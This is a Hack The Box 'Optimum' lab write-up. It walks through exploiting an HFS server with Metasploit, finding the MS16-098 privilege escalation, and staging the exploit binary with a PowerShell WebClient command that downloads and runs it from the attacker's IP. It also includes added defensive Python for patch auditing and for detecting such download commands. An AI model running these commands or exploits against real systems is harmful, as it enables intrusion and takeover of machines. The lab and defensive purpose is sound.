Hack the box optimum
2022-04-23 02:29:00 【zr1213159840】
First start the target machine, then scan it directly with nmap.
nmap -sV -Pn -A 10.10.10.8
The scan results show that port 80 is open and that it is running the HFS service. Next, search msf for known HFS vulnerabilities.
search hfs
Select the HFS module from the results, then check which options need to be configured.
use 1
options
The remote host and the local host need to be configured. Once they are set, run. You may have to run it several times: the first few attempts tend to fail, and it can take a long time.
set RHOSTS 10.10.10.8
set LHOST 10.10.14.17
run
After the exploit succeeds, a meterpreter session is returned. List the files in the current folder; the user flag is visible there.
You can read user.txt.txt directly, or enter a shell and read user.txt.txt from there.
# Read it directly
cat user.txt.txt
Then keep looking, to see whether you can enter the administrator folder. It turns out that you can't, and you can't create new users either.
I wanted to escalate privileges directly with msf, but no elevated permissions were obtained after execution. So how should we escalate? Check which patches have been installed. systeminfo can still be run.
After getting this information, compare it using the Windows-Exploit-Suggester script to look for the way in. (I couldn't even run this script here; it reported an xlrd error. Note that this script is written in python2.)
The address is https://github.com/AonCyberLabs/Windows-Exploit-Suggester. See the README for how to use it. Remember that it needs python2 with xlrd installed.
Copy the systeminfo output from the remote host into a local file, then use the following command to compare
python2 windows-exploit-suggester.py --database 2021-04-21-mssb.xls --systeminfo sysinfo.txt
The comparison results show that MS16-098 can be used for privilege escalation. The privilege-escalation exe is available at this link.
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
After downloading, start a local HTTP server in the folder that contains the exe
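From the defender's side, the same comparison works as a patch audit. The following is an added example (not code from the original post or from Windows-Exploit-Suggester) that parses `systeminfo` output and reports required KBs that are not installed. The sample output and host name are constructed, and the bulletin-to-KB mapping (KB3177725 for MS16-098) is an assumption to verify against the Microsoft bulletin for your OS build.

```python
import re

# Constructed sample of `systeminfo` output (not taken from the host in this post).
SAMPLE_SYSTEMINFO = """\
Host Name:                 LAB-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Bulletin -> KBs that remediate it. Assumption: fill this in from the Microsoft
# bulletin for your OS build; KB3177725 is the update assumed here for MS16-098.
REQUIRED_KBS = {"MS16-098": {"KB3177725"}}


def parse_systeminfo(text):
    """Return the OS name/version and the set of installed hotfix KB ids."""
    info = {"os_name": None, "os_version": None, "hotfixes": set()}
    in_hotfixes = False
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            info["os_name"] = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            info["os_version"] = line.split(":", 1)[1].strip()
        elif line.startswith("Hotfix(s):"):
            in_hotfixes = True
        elif in_hotfixes:
            m = re.match(r"\s+\[\d+\]:\s*(KB\d+)\s*$", line)
            if m:
                info["hotfixes"].add(m.group(1))
            elif not line.startswith(" "):
                in_hotfixes = False  # next top-level field ends the list
    return info


def missing_patches(info, required=REQUIRED_KBS):
    """Map each bulletin to the required KBs that are not installed."""
    return {b: sorted(kbs - info["hotfixes"])
            for b, kbs in required.items() if kbs - info["hotfixes"]}


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host["os_name"], "| missing:", missing_patches(host))
```

A KB reported as missing may have been superseded by a later rollup, so treat each hit as a lead to confirm rather than a verdict.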
python3 -m http.server 888
Then execute the following command in the shell on the target machine
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
This command downloads 41020.exe from 10.10.14.17 and saves it to the path given as the second argument.
Find it at that location, then execute 41020.exe, and the highest privileges are obtained smoothly.
Go to users/administrator/desktop to get root.txt. Done.
Postscript: Finding user.txt earlier is not hard. However, the later privilege-escalation process involves the python2 environment and so on, which is a lot of trouble. In particular, running the Windows-Exploit-Suggester script was unsuccessful, so I referred directly to other people's content; you can try it yourself. Also, Kali doesn't seem to ship with pip2; you can refer to the following links.
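A download command like this one leaves a clear trace in process-creation logs. The following added example (not part of the original post) scores command lines for the pattern: a WebClient download from a raw IP on an unusual port that writes an executable into a user-writable folder. The event records are constructed, and the parent paths and the `SERVER_PARENTS` list are assumptions; real detections should walk the full ancestor chain.

```python
import re
from urllib.parse import urlsplit

# Constructed (parent image, command line) records; parent paths are assumptions.
EVENTS = [
    (r"C:\Windows\explorer.exe",
     r'powershell -NoProfile -Command "Get-ChildItem C:\Temp"'),
    (r"C:\Windows\System32\cmd.exe",
     r'''powershell -c "(New-Object Net.WebClient).DownloadFile('https://downloads.example.com/tool.zip', 'D:\pkg\tool.zip')"'''),
    (r"C:\hfs\hfs.exe",
     r'''powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"'''),
]

CRADLE = re.compile(
    r"Net\.WebClient\)?\s*\.Download(?:File|String)\(\s*['\"]([^'\"]+)['\"]"
    r"(?:\s*,\s*['\"]([^'\"]+)['\"])?", re.I)
WRITABLE = re.compile(r"\\(users\\public|appdata|temp|programdata)\\", re.I)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".scr")
IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}$")
SERVER_PARENTS = {"hfs.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}  # assumption


def assess(parent, cmdline):
    """Return the reasons a process creation looks like a staged download."""
    m = CRADLE.search(cmdline)
    if not m:
        return []
    url, dest = m.group(1), (m.group(2) or "")
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:  # malformed port in the URL
        port = None
    reasons = ["WebClient download cradle"]
    if IPV4.match(parts.hostname or ""):
        reasons.append("URL host is a raw IP address")
    if port not in (None, 80, 443):
        reasons.append(f"non-standard port {port}")
    if WRITABLE.search(dest) and dest.lower().endswith(EXEC_EXT):
        reasons.append("executable written to a user-writable path")
    image = parent.lower().rsplit("\\", 1)[-1]
    if image in SERVER_PARENTS:
        reasons.append(f"spawned under server process {image}")
    return reasons


if __name__ == "__main__":
    for parent, cmd in EVENTS:
        print(assess(parent, cmd))
```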
Reference link
https://ranakhalil101.medium.com/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c
For installing pip2, refer to:
https://www.cnblogs.com/lzkalislw/p/15579620.html
Copyright notice
This article was written by [zr1213159840]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204230226467825.html